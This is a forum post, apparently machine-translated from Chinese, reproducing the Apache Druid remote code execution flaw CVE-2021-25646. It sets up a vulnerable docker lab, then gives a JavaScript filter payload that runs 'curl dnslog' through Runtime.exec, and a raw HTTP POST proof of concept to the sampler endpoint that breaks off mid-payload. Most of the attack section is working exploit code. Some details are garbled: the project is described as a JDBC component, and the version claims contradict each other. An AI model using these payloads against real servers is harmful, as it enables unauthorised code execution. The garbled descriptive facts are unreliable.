Jump to content

Title: CVE-2021-25646 - Apache Druid RCE Reappearance

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

Apache Druid RCE 复现

1 漏洞介绍

1.1 Druid

Druid is a JDBC component that supports all JDBC-compatible databases, including Oracle, MySql, Derby, Postgresql, SQL Server, H2, etc.

1.2 漏洞描述

编号:CVE-2021-25646Apache Druid includes code that executes user-provided JavaScript functionality embedded in various types of requests. This feature is disabled by default in high trust environments. However, in Druid 0.20.0 and lower, authenticated users can construct incoming json strings to control some sensitive parameters to send malicious requests, and use the Apache Druid vulnerability to execute arbitrary code.

1.3 影响版本

Apache Druid 0.20.1

2 漏洞复现

2.1 环境搭建

Pull a mirror version 0.16.0 from the docker repository:

1

2

docker pull fokkodriesprong/docker-druid

docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid

20210202215229.png-water_print

2.2 复现

After the docker container is started, access port 8888:

20210202224141.png-water_print

Click Load data - Local Disk:

20210202224155.png-water_print

Fill in

Base directory:quickstart/tutorial/

File filter:wikiticker-2015-09-12-sampled.json.gz

Click next to filter item

20210202224208.png-water_print

Modify the filter to:

1

2

3

4

5

6

7

8

{

'type':'javascript',

'function':'function(value){return java.lang.Runtime.getRuntime().exec('curl dnslog')}',

'dimensional':'added',

'':{

'enabled':'true'

}

}

20210202224306.png-water_print

20210202224325.png-water_print

20210202224502.png-water_print

You can also use POC directly:

1

2

3

4

5

6

7

8

9

10

11

POST /druid/indexer/v1/sampler HTTP/1.1

Host: xxx.xxx.xxx.xxx:8888

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0

Accept: application/json, text/plain, */*

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Content-Type: application/json

Content-Length: 995

Connection: close

{'type': 'index', 'spec': {'ioConfig': {'type': 'index', 'inputSource': {'type': 'inline', 'data': '{\'isRobot\':true,\'channel\':\'#x\',\'timestamp\':\'2021-2-1T14:12:24.050Z\',\'flags\':\'x\',\'isUnpatrolled\':false,\'page\':\'1\',\'diffUrl\':\'https://xxx.com\',\'added\':1,\'comment\':\'Botskapande Indonesian omdirigering\',\'commentLength\':35,\'isNew\':true,\'isMinor\':false,\'delta\':true,\'isAnonymous\':true,\'user\':\'Lsjbot\',\'deltaBucket\':0,\'deleted\':0,\'namespace\':\'Main\'}'}, 'inputFormat': {'type': 'json', 'keepNullColumns': true}}, 'dataSchema': {'dataSource': 'sample', 'timestampSpec': {'column': 'timestamp', 'format': 'iso'}, 'dimensionalsSpec': {}, 'transformSpec': {'transforms': [], 'filter': {'type': 'javascript', 'dimensionality': 'added', 'function': 'function(value) {java.lang.Runtime.getRuntime().exec('curl

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.